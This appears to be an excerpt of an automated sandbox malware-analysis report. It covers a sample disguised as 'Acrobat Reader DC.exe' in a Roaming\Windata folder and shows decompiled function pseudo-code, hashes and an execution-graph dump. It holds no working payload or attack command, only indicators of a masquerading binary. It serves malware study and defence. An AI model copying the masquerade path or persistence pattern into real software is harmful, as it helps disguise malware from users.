                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: u,D
                                  • API String ID: 4104443479-3858472334
                                  • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                  • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044CDE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044CDE9(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr* _t26;
				intOrPtr* _t35;
				intOrPtr* _t36;

				_t26 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				E004013C0( *(_t35 + 4) +  *((intOrPtr*)(_t26 + 4)), _t36, __eflags);
				E00410E60( *_t36,  *_t35,  *(_t35 + 4) +  *(_t35 + 4));
				E00410E60( *_t36 +  *(_t35 + 4) * 2,  *_t26,  *((intOrPtr*)(_t26 + 4)) + 1 +  *((intOrPtr*)(_t26 + 4)) + 1);
				 *((intOrPtr*)(_t36 + 4)) =  *(_t35 + 4) +  *((intOrPtr*)(_t26 + 4));
				return _t36;
			}






                                  0x0044cded
                                  0x0044cdf1
                                  0x0044cdf5
                                  0x0044ce00
                                  0x0044ce11
                                  0x0044ce29
                                  0x0044ce38
                                  0x0044ce40

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  • Opcode ID: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                  • Instruction ID: e6e9f2aa443a554b8bda50df2a041f2c42dbd20d32390c21629c974d0e28b4a3
                                  • Opcode Fuzzy Hash: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                  • Instruction Fuzzy Hash: 2101EFB6200115ABC704DF49D981D6AF7A9FF88710708855AF819CB302D774FD20CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00442651(char _a4) {
				void** _t10;

				_t1 =  &_a4; // 0x426561
				_t10 =  *_t1;
				InternetCloseHandle(_t10[1]);
				InternetCloseHandle( *_t10);
				 *_t10 = 0;
				_t10[1] = 0;
				return E004319AC( &(_t10[0x35]), 0x2710);
			}




                                  0x00442655
                                  0x00442655
                                  0x00442663
                                  0x00442668
                                  0x0044266a
                                  0x00442670
                                  0x0044268b

                                  APIs
                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                  • InternetCloseHandle.WININET ref: 00442668
                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                  • String ID: aeB
                                  • API String ID: 857135153-906807131
                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00433244(intOrPtr _a4, intOrPtr _a8, char _a12) {
				void* _t8;
				void* _t10;
				intOrPtr _t13;
				signed int _t14;

				_t1 =  &_a12; // 0x425e09
				_t14 =  *_t1;
				_t13 = _a4;
				if(_t14 != 0) {
					_t10 = E00412FBA(_t13, _a8, _t14 - 1);
					 *((short*)(_t13 + _t14 * 2 - 2)) = 0;
					return _t10;
				}
				return _t8;
			}







                                  0x00433248
                                  0x00433248
                                  0x0043324c
                                  0x00433251
                                  0x0043325c
                                  0x00433266
                                  0x00000000
                                  0x00433266
                                  0x0043326e

                                  APIs
                                  Strings
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 0043324B
                                  • ^B, xrefs: 00433248
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcsncpy
                                  • String ID: ^B$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 1735881322-2741327645
                                  • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                  • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00431E1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00431E1F(WCHAR* _a4) {
				short _v528;

				GetTempPathW(0x104,  &_v528);
				return GetTempFileNameW( &_v528, L"aut", 0, _a4);
			}




                                  0x00431e34
                                  0x00431e55

                                  APIs
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Temp$FileNamePath
                                  • String ID: aut
                                  • API String ID: 3285503233-3010740371
                                  • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                  • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                  • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                  • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:8.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1800
                                  Total number of Limit Nodes:29
                                  execution_graph 29427 44a444 55 API calls 29428 448046 CreatePopupMenu CreatePopupMenu 29429 440c49 8 API calls 29430 435457 55 API calls 29431 44cc51 7 API calls 29432 445e52 13 API calls 29433 43305f 89 API calls 2 library calls 29434 443a61 EnumChildWindows 29435 43646a SendMessageTimeoutW GetWindowThreadProcessId GetCurrentThreadId AttachThreadInput 29436 44ba68 65 API calls 29437 44786a LoadLibraryA GetProcAddress FreeLibrary DefDlgProcW 29440 431877 54 API calls 2 library calls 29441 441672 ClientToScreen GetWindowRect PtInRect MessageBeep 29442 441078 7 API calls 29443 430003 InvalidateRect moneypunct 29444 435403 56 API calls 29446 444006 GetMenuItemInfoW _memset 29449 449c00 SendMessageW SendMessageW SendMessageW 29450 42fe05 GetWindowLongW DefDlgProcW 29451 44900d 10 API calls 29452 41320f GetStringTypeW __wtof_l 29453 430e0d LoadLibraryA GetProcAddress 29454 44560a InterlockedDecrement 29456 433a13 91 API calls 7 library calls 29457 445a11 SendMessageTimeoutW SendMessageW GetParent InvalidateRect 29458 441018 GetWindowLongW GetWindowLongW GetWindowLongW 29459 431e1f GetTempPathW GetTempFileNameW 29460 40d220 VariantClear QueryPerformanceCounter 29461 422c20 RtlUnwind 29462 434621 10 API calls 29463 445e20 6 API calls 29464 436c2b 6 API calls 29466 44c228 54 API calls 29467 44982a 11 API calls 29468 43542d 55 API calls 29471 44cc34 OleSetContainedObject IsWindow DestroyWindow moneypunct 29472 44a032 74 API calls 29475 44ae3e CloseHandle moneypunct 29476 4340c3 FlushFileBuffers 29477 40d2c0 52 API calls 29478 4352c2 6 API calls 29481 4426cd 59 API calls _wcslen 29482 4152ca 79 API calls 3 library calls 27378 40ccd0 27418 40cc70 27378->27418 27381 42c3bb 27450 45e737 90 API calls 3 library calls 27381->27450 27382 40cd1b 27387 40cd30 27382->27387 27406 40cdad 27382->27406 27384 40cd72 27386 402780 52 API calls 27384->27386 27388 40cd80 27386->27388 27387->27384 27392 40cd8a moneypunct 27387->27392 27427 402780 27387->27427 27435 40e7d0 294 API calls 27388->27435 27389 40ce40 27436 40ceb0 53 API calls 27389->27436 27393 40ce53 27437 408f40 27393->27437 27395 40ce5b 27397 408f40 VariantClear 27395->27397 27396 42c3a0 27448 45e737 90 API calls 3 library calls 27396->27448 27400 40ce63 27397->27400 27399 42c31a 27441 45e737 90 API calls 3 library calls 27399->27441 27402 42c3ad 27449 452670 VariantClear 27402->27449 27403 40cc70 141 API calls 27403->27406 27404 42c327 27442 452670 VariantClear 27404->27442 27406->27389 27406->27396 27406->27399 27406->27403 27408 42c335 27406->27408 27409 42c370 27406->27409 27413 42c343 27406->27413 27443 452670 VariantClear 27408->27443 27446 45e737 90 API calls 3 library calls 27409->27446 27412 42c392 27447 452670 VariantClear 27412->27447 27444 45e737 90 API calls 3 library calls 27413->27444 27416 42c362 27445 452670 VariantClear 27416->27445 27451 40a780 27418->27451 27420 40cc96 27421 42bd0e 27420->27421 27422 40cc9e 27420->27422 27423 408f40 VariantClear 27421->27423 27425 408f40 VariantClear 27422->27425 27424 42bd16 27423->27424 27426 40ccb8 27425->27426 27426->27381 27426->27382 27426->27392 27428 402827 27427->27428 27433 402790 moneypunct _memmove 27427->27433 27430 4115d7 52 API calls 27428->27430 27429 4115d7 52 API calls 27431 402797 27429->27431 27430->27433 27432 4115d7 52 API calls 27431->27432 27434 4027bd 27431->27434 27432->27434 27433->27429 27434->27387 27435->27392 27436->27393 27440 408f48 moneypunct 27437->27440 27438 4265c7 VariantClear 27439 408f55 moneypunct 27438->27439 27439->27395 27440->27438 27440->27439 27441->27404 27442->27392 27443->27392 27444->27416 27445->27392 27446->27412 27447->27392 27448->27402 27449->27392 27450->27392 27452 40a7a6 27451->27452 27453 40ae8c 27451->27453 27506 4115d7 27452->27506 27517 41130a 51 API calls __cinit 27453->27517 27456 40a86d 27457 40abd1 27456->27457 27473 40a878 moneypunct 27456->27473 27528 45e737 90 API calls 3 library calls 27457->27528 27460 408e80 VariantClear 27488 40a7c6 moneypunct _memmove 27460->27488 27461 42b791 VariantClear 27461->27488 27462 408f40 VariantClear 27462->27473 27463 4115d7 52 API calls 27463->27488 27464 42ba2d VariantClear 27464->27488 27465 40e270 VariantClear 27465->27488 27466 42b459 VariantClear 27466->27488 27467 40a884 moneypunct 27467->27420 27468 42b6f6 VariantClear 27468->27488 27469 40bc10 53 API calls 27469->27488 27472 42bc5b 27472->27420 27473->27462 27473->27467 27474 42bbf5 27529 45e737 90 API calls 3 library calls 27474->27529 27475 42bb6a 27531 44b92d VariantClear 27475->27531 27476 4115d7 52 API calls 27480 42b5b3 VariantInit VariantCopy 27476->27480 27477 40b5f0 89 API calls 27477->27488 27479 408f40 VariantClear 27479->27488 27482 42b5d7 VariantClear 27480->27482 27480->27488 27482->27488 27485 42bc37 27530 45e737 90 API calls 3 library calls 27485->27530 27488->27456 27488->27457 27488->27460 27488->27461 27488->27463 27488->27464 27488->27465 27488->27466 27488->27468 27488->27469 27488->27474 27488->27475 27488->27476 27488->27477 27488->27479 27488->27485 27491 4530c9 VariantClear 27488->27491 27492 408cc0 27488->27492 27518 401b10 27488->27518 27524 45308a 53 API calls 27488->27524 27525 470870 52 API calls 27488->27525 27526 457f66 87 API calls __write_nolock 27488->27526 27527 472f47 127 API calls 27488->27527 27489 42bc48 27490 408f40 VariantClear 27489->27490 27490->27475 27491->27488 27532 408d90 27492->27532 27494 429778 27554 410c60 VariantClear moneypunct 27494->27554 27496 429780 27497 408cf9 27497->27494 27498 42976c 27497->27498 27500 408d2d 27497->27500 27553 45e737 90 API calls 3 library calls 27498->27553 27548 403d10 27500->27548 27502 408d3d 27502->27494 27505 408d45 moneypunct 27502->27505 27503 408d71 moneypunct 27503->27488 27504 408f40 VariantClear 27504->27505 27505->27503 27505->27504 27508 4115e1 _malloc 27506->27508 27509 4115fb 27508->27509 27512 4115fd std::exception::exception 27508->27512 27563 4135bb 27508->27563 27509->27488 27510 41163b 27578 4180af 46 API calls std::exception::operator= 27510->27578 27512->27510 27577 41130a 51 API calls __cinit 27512->27577 27513 411645 27579 418105 RaiseException 27513->27579 27516 411656 27517->27488 27519 401b16 _wcslen 27518->27519 27520 4115d7 52 API calls 27519->27520 27523 401b63 27519->27523 27521 401b4b _memmove 27520->27521 27522 4115d7 52 API calls 27521->27522 27522->27523 27523->27488 27524->27488 27525->27488 27526->27488 27527->27488 27528->27475 27529->27475 27530->27489 27531->27472 27533 4289d2 27532->27533 27534 408db3 27532->27534 27557 45e737 90 API calls 3 library calls 27533->27557 27555 40bec0 90 API calls 27534->27555 27537 4289e5 27558 45e737 90 API calls 3 library calls 27537->27558 27540 428a05 27541 408f40 VariantClear 27540->27541 27547 408e5a 27541->27547 27542 40a780 141 API calls 27544 408dc9 27542->27544 27543 408e64 27545 408f40 VariantClear 27543->27545 27544->27537 27544->27540 27544->27542 27544->27543 27546 408f40 VariantClear 27544->27546 27544->27547 27556 40ba10 52 API calls 2 library calls 27544->27556 27545->27547 27546->27544 27547->27497 27549 408f40 VariantClear 27548->27549 27550 403d20 27549->27550 27559 403cd0 27550->27559 27552 403d4d 27552->27502 27553->27494 27554->27496 27555->27544 27556->27544 27557->27537 27558->27540 27560 403cdf 27559->27560 27561 408f40 VariantClear 27560->27561 27562 403ce7 27561->27562 27562->27552 27564 413638 _malloc 27563->27564 27571 4135c9 _malloc 27563->27571 27587 417f77 46 API calls __getptd_noexit 27564->27587 27567 4135f7 RtlAllocateHeap 27568 413630 27567->27568 27567->27571 27568->27508 27570 413624 27585 417f77 46 API calls __getptd_noexit 27570->27585 27571->27567 27571->27570 27572 4135d4 27571->27572 27575 413622 27571->27575 27572->27571 27580 418901 46 API calls __NMSG_WRITE 27572->27580 27581 418752 46 API calls 7 library calls 27572->27581 27582 411682 27572->27582 27586 417f77 46 API calls __getptd_noexit 27575->27586 27577->27510 27578->27513 27579->27516 27580->27572 27581->27572 27588 411657 GetModuleHandleW 27582->27588 27585->27575 27586->27568 27587->27568 27589 411680 ExitProcess 27588->27589 27590 41166b GetProcAddress 27588->27590 27590->27589 27591 41167b 27590->27591 27591->27589 29483 40d0d0 53 API calls 29484 416cd0 6 API calls 3 library calls 29485 44c6d7 19 API calls 29486 41f4d6 47 API calls 2 library calls 29404 4118da 29407 41179a 29404->29407 29406 4118eb 29408 4117a6 _raise 29407->29408 29409 4182cb __lock 46 API calls 29408->29409 29419 4117ad _raise 29409->29419 29413 4118bc 29415 4118c5 29413->29415 29416 411682 _fast_error_exit 3 API calls 29413->29416 29414 4118d4 _raise 29414->29406 29417 4118d2 29415->29417 29425 4181f2 LeaveCriticalSection 29415->29425 29416->29415 29417->29406 29420 4118c5 29419->29420 29421 4118a5 29420->29421 29422 4118cb 29420->29422 29421->29414 29424 4181f2 LeaveCriticalSection 29421->29424 29426 4181f2 LeaveCriticalSection 29422->29426 29424->29413 29425->29417 29426->29421 27592 4010e0 27595 401100 27592->27595 27594 4010f8 27596 401113 27595->27596 27597 401184 27596->27597 27598 40114c 27596->27598 27600 401120 27596->27600 27631 401182 27596->27631 27633 401250 61 API calls _memset 27597->27633 27601 401151 27598->27601 27602 40119d 27598->27602 27599 40112c DefWindowProcW 27599->27594 27600->27599 27658 401000 Shell_NotifyIconW _memset 27600->27658 27604 401219 27601->27604 27605 40115d 27601->27605 27607 4011a3 27602->27607 27608 42afb4 27602->27608 27604->27600 27611 401225 27604->27611 27609 401163 27605->27609 27610 42b01d 27605->27610 27606 401193 27606->27594 27607->27600 27617 4011b6 KillTimer 27607->27617 27618 4011db SetTimer RegisterWindowMessageW 27607->27618 27635 40f190 27608->27635 27614 42afe9 27609->27614 27615 40116c 27609->27615 27610->27599 27657 4370f4 52 API calls 27610->27657 27660 468b0e 74 API calls _memset 27611->27660 27625 40f190 10 API calls 27614->27625 27615->27600 27622 401174 27615->27622 27616 42b04f 27659 40e0c0 74 API calls _memset 27616->27659 27634 401000 Shell_NotifyIconW _memset 27617->27634 27618->27606 27620 401204 CreatePopupMenu 27618->27620 27620->27594 27640 45fd57 65 API calls _memset 27622->27640 27628 42b00e 27625->27628 27626 4011c9 PostQuitMessage 27626->27594 27627 42afe4 27627->27606 27641 401a50 27628->27641 27631->27599 27632 42afdc 27632->27599 27632->27627 27633->27606 27634->27626 27661 40f170 27635->27661 27637 40f19d 27638 40f1c8 27637->27638 27665 44b79b 7 API calls 27637->27665 27638->27606 27640->27632 27642 401b10 52 API calls 27641->27642 27643 401a7b 27642->27643 27667 403e10 27643->27667 27645 401a8d 27646 408f40 VariantClear 27645->27646 27647 401aa2 27646->27647 27648 401b10 52 API calls 27647->27648 27649 401ab9 27648->27649 27650 403e10 53 API calls 27649->27650 27655 401acb 27650->27655 27651 401af8 27652 408f40 VariantClear 27651->27652 27654 401b0a 27652->27654 27654->27631 27655->27651 27684 465124 53 API calls 27655->27684 27685 46ff4b 294 API calls 27655->27685 27657->27631 27658->27616 27659->27631 27660->27627 27664 40f180 27661->27664 27662 40f188 27662->27637 27664->27662 27666 442651 WaitForSingleObject InternetCloseHandle InternetCloseHandle 27664->27666 27665->27637 27666->27664 27686 403ea0 52 API calls __cinit 27667->27686 27669 403e1d 27670 403e25 27669->27670 27671 428987 27669->27671 27672 4115d7 52 API calls 27670->27672 27694 408e80 VariantClear 27671->27694 27673 403e34 27672->27673 27675 403e44 27673->27675 27687 40bc70 27673->27687 27678 403e51 27675->27678 27692 403c30 52 API calls _memmove 27675->27692 27676 428993 27676->27645 27680 4115d7 52 API calls 27678->27680 27681 403e5e 27680->27681 27693 403da0 52 API calls 27681->27693 27683 403e82 27683->27645 27684->27655 27685->27655 27686->27669 27688 4115d7 52 API calls 27687->27688 27689 40bc98 27688->27689 27690 4115d7 52 API calls 27689->27690 27691 40bca6 27690->27691 27691->27675 27692->27678 27693->27683 27694->27676 29487 40c6e0 58 API calls 29488 443ee5 ReadFile SetFilePointerEx 29489 4440e0 53 API calls 2 library calls 29491 432ee9 60 API calls __forcdecpt_l 29493 4404e8 8 API calls 29494 4414f4 GetWindowLongW PostMessageW 29495 44c6f6 VkKeyScanW MapVirtualKeyW 29497 44c285 SetFilePointerEx SetFilePointerEx 29498 44aa86 137 API calls 29499 435481 VariantCopy VariantChangeType 29500 443a87 56 API calls moneypunct 29501 443c87 52 API calls 29502 440880 56 API calls 29503 448480 GetMenuItemInfoW IsMenu InsertMenuItemW DrawMenuBar _memset 29504 442a83 7 API calls 29507 447e8e 53 API calls 29508 43288e InterlockedIncrement 27695 40dc90 27696 40bc70 52 API calls 27695->27696 27697 40dd03 27696->27697 27703 40f210 27697->27703 27699 426a97 27701 40dd96 27701->27699 27702 40ddb7 27701->27702 27706 40dc00 52 API calls 2 library calls 27701->27706 27707 40f250 RegOpenKeyExW 27703->27707 27705 40f230 27705->27701 27706->27701 27708 425e17 27707->27708 27709 40f275 RegQueryValueExW 27707->27709 27708->27705 27710 40f2c3 RegCloseKey 27709->27710 27711 40f298 27709->27711 27710->27705 27712 40f2a9 RegCloseKey 27711->27712 27713 425e1d 27711->27713 27712->27705 29510 433493 60 API calls 3 library calls 29511 44429f 64 API calls 29512 43009d 14 API calls 29513 44389a 53 API calls 2 library calls 29514 41aaa1 53 API calls __calloc_crt 29516 4368a0 SendMessageW SendMessageW SendMessageW SendMessageW 29517 4478ac 6 API calls 29518 434aa8 FreeLibrary moneypunct 29519 4426a9 WaitForSingleObject 27714 40d6b0 27715 42e2f3 27714->27715 27716 40d6cc 27714->27716 27717 408f40 VariantClear 27716->27717 27718 40d707 27717->27718 27737 40ebb0 27718->27737 27721 40d737 27740 411951 27721->27740 27726 40d751 27752 40f4e0 SystemParametersInfoW SystemParametersInfoW 27726->27752 27728 40d75f 27753 40d590 GetCurrentDirectoryW 27728->27753 27730 40d767 SystemParametersInfoW 27731 40d794 27730->27731 27732 40d78d FreeLibrary 27730->27732 27733 408f40 VariantClear 27731->27733 27732->27731 27734 40d79d 27733->27734 27735 408f40 VariantClear 27734->27735 27736 40d7a6 27735->27736 27793 40ebd0 27737->27793 27797 4182cb 27740->27797 27742 41195e 27804 4181f2 LeaveCriticalSection 27742->27804 27744 40d748 27745 4119b0 27744->27745 27746 4119d6 27745->27746 27747 4119bc 27745->27747 27746->27726 27747->27746 27851 417f77 46 API calls __getptd_noexit 27747->27851 27749 4119c6 27852 417f25 10 API calls __mbschr_l 27749->27852 27751 4119d1 27751->27726 27752->27728 27853 401f20 27753->27853 27755 40d5b6 IsDebuggerPresent 27756 40d5c4 27755->27756 27757 42e1bb MessageBoxA 27755->27757 27758 42e1d4 27756->27758 27759 40d5e3 27756->27759 27757->27758 28024 403a50 52 API calls 3 library calls 27758->28024 27923 40f520 27759->27923 27763 40d5fd GetFullPathNameW 27935 401460 27763->27935 27765 40d63b 27766 40d643 27765->27766 27767 42e231 SetCurrentDirectoryW 27765->27767 27768 40d64c 27766->27768 28025 432fee 6 API calls 27766->28025 27767->27766 27950 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 27768->27950 27771 42e252 27771->27768 27773 42e25a GetModuleFileNameW 27771->27773 27775 42e274 27773->27775 27776 42e2cb GetForegroundWindow ShellExecuteW 27773->27776 27779 401b10 52 API calls 27775->27779 27778 40d688 27776->27778 27777 40d656 27780 40d669 27777->27780 28022 40e0c0 74 API calls _memset 27777->28022 27785 40d692 SetCurrentDirectoryW 27778->27785 27781 42e281 27779->27781 27958 4091e0 27780->27958 28026 40d200 52 API calls 2 library calls 27781->28026 27785->27730 27787 42e28d 28027 40d200 52 API calls 2 library calls 27787->28027 27790 42e299 GetForegroundWindow ShellExecuteW 27791 42e2c6 27790->27791 27791->27778 27792 40ec00 LoadLibraryA GetProcAddress 27792->27721 27794 40d72e 27793->27794 27795 40ebd6 LoadLibraryA 27793->27795 27794->27721 27794->27792 27795->27794 27796 40ebe7 GetProcAddress 27795->27796 27796->27794 27798 4182e0 27797->27798 27799 4182f3 EnterCriticalSection 27797->27799 27805 418209 27798->27805 27799->27742 27801 4182e6 27801->27799 27832 411924 46 API calls 3 library calls 27801->27832 27803 4182f2 27803->27799 27804->27744 27806 418215 _raise 27805->27806 27807 418225 27806->27807 27808 41823d 27806->27808 27833 418901 46 API calls __NMSG_WRITE 27807->27833 27820 41824b _raise 27808->27820 27835 416b04 27808->27835 27811 41822a 27834 418752 46 API calls 7 library calls 27811->27834 27814 41825d 27841 417f77 46 API calls __getptd_noexit 27814->27841 27815 41826c 27818 4182cb __lock 45 API calls 27815->27818 27816 418231 27819 411682 _fast_error_exit 3 API calls 27816->27819 27821 418273 27818->27821 27822 41823b 27819->27822 27820->27801 27823 4182a6 27821->27823 27824 41827b InitializeCriticalSectionAndSpinCount 27821->27824 27822->27808 27825 413748 _free 45 API calls 27823->27825 27826 418297 27824->27826 27827 41828b 27824->27827 27825->27826 27849 4182c2 LeaveCriticalSection _doexit 27826->27849 27842 413748 27827->27842 27830 418291 27848 417f77 46 API calls __getptd_noexit 27830->27848 27832->27803 27833->27811 27834->27816 27837 416b0d 27835->27837 27836 4135bb _malloc 45 API calls 27836->27837 27837->27836 27838 416b43 27837->27838 27839 416b24 Sleep 27837->27839 27838->27814 27838->27815 27840 416b39 27839->27840 27840->27837 27840->27838 27841->27820 27843 41377c _free 27842->27843 27844 413753 RtlFreeHeap 27842->27844 27843->27830 27844->27843 27845 413768 27844->27845 27850 417f77 46 API calls __getptd_noexit 27845->27850 27847 41376e GetLastError 27847->27843 27848->27826 27849->27820 27850->27847 27851->27749 27852->27751 28028 40e6e0 27853->28028 27857 401f41 GetModuleFileNameW 28046 410100 27857->28046 27859 401f5c 28058 410960 27859->28058 27862 401b10 52 API calls 27863 401f81 27862->27863 28061 401980 27863->28061 27865 401f8e 27866 408f40 VariantClear 27865->27866 27867 401f9d 27866->27867 27868 401b10 52 API calls 27867->27868 27869 401fb4 27868->27869 27870 401980 53 API calls 27869->27870 27871 401fc3 27870->27871 27872 401b10 52 API calls 27871->27872 27873 401fd2 27872->27873 28069 40c2c0 27873->28069 27875 401fe1 27876 40bc70 52 API calls 27875->27876 27877 401ff3 27876->27877 28087 401a10 27877->28087 27879 401ffe 28094 4114ab 27879->28094 27882 428b05 27884 401a10 52 API calls 27882->27884 27883 402017 27885 4114ab __wcsicoll 58 API calls 27883->27885 27886 428b18 27884->27886 27887 402022 27885->27887 27889 401a10 52 API calls 27886->27889 27887->27886 27888 40202d 27887->27888 27890 4114ab __wcsicoll 58 API calls 27888->27890 27891 428b33 27889->27891 27892 402038 27890->27892 27894 428b3b GetModuleFileNameW 